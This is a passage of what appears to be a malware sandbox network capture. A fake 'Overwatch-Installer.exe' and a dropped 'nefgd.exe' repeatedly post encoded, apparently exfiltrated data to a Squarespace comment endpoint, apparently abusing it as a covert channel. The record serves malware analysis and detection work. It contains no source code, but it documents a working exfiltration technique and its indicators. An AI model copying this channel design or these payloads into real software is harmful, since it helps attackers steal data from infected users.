2024-09-01 20:04:55 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bbb6ebAWHq3ZZDFjOTExNTJhN2VkZDZmNzEwZThmZDA5YmJkMzM4; Path=/; Secure Set-Cookie: crumb=BS4oxwVXTYISZGY3MGU5NjllMDI1YWQ4NDVkYzZiNGYwNjdlZTcz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: O3qMgXIr/sQK9RTrx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BS4oxwVXTYISZGY3MGU5NjllMDI1YWQ4NDVkYzZiNGYwNjdlZTcz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	49827	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:55 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:55 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bcu0G_YzOIBjZDk2NzNmMTk1NjlhZTFhMWI0ZTBmYzAyNjNkZjVi; Path=/; Secure Set-Cookie: crumb=BRAC1hFroYZ-NTk0OTk2ZWE3OTczMGFiNzAzZTM3NzJjNjA4M2Rj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: VD7qemue/UjEfiajY Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRAC1hFroYZ-NTk0OTk2ZWE3OTczMGFiNzAzZTM3NzJjNjA4M2Rj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	49828	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:55 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:55 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 62 50 79 72 61 76 6f 79 77 39 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTbPyravoyw9wgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:55 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:55 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:55 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:55 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdH775cEfF-MNzY0ZWQ5ZjI5ZTQyYzgyYTZhZTBjOGUwYWE1MjI1; Path=/; Secure Set-Cookie: crumb=BSLj4QhEjeKqYzY1MDBhMTViNjIyODcxNThiODY4ZDZkYjA0NjRk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BMt99tE1/JgjKYoqn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSLj4QhEjeKqYzY1MDBhMTViNjIyODcxNThiODY4ZDZkYjA0NjRk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	49829	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:55 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:55 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BY3F15CdTlilMjQwYzI2MGJhOWYyMTVjNTdjNDNiM2UyNjA3NTky; Path=/; Secure Set-Cookie: crumb=BcxNj-d6_qlzNGM3MjA1Y2Y4ZWQ4ZTUwMGVlNDRiYTRjNWU1Yzc5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 74s7dQPr/HKfl3jh3 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcxNj-d6_qlzNGM3MjA1Y2Y4ZWQ4ZTUwMGVlNDRiYTRjNWU1Yzc5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	49831	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:56 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSOgdHT1z_ZhODhiNjRlZDNmZGZkMzAxZDQ2MGZlYzQwOGQzNTM4; Path=/; Secure Set-Cookie: crumb=Bd6wk1KFhhKaY2Q2YmJiNmIzZGEzMjg3Nzc2Yzk1NmY4NGYwMTEz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: JXHG8ALi/C29XSRXv Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bd6wk1KFhhKaY2Q2YmJiNmIzZGEzMjg3Nzc2Yzk1NmY4NGYwMTEz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	49830	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:56 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeG8ssckeSgTMDllMWQ4ZmE0YTljZDk5Nzc0OTIyNmI1ZTkwZTYy; Path=/; Secure Set-Cookie: crumb=BfgMGqLrulhnZGQ3MDg0ZTg1ZmM3YWY4M2VkZDQ5Y2JiY2MzMjg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8lN6A3GV/U7cRopGw Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfgMGqLrulhnZGQ3MDg0ZTg1ZmM3YWY4M2VkZDQ5Y2JiY2MzMjg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	49832	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:56 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 79 5a 55 69 36 76 52 6c 41 63 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTyZUi6vRlAcAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:56 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 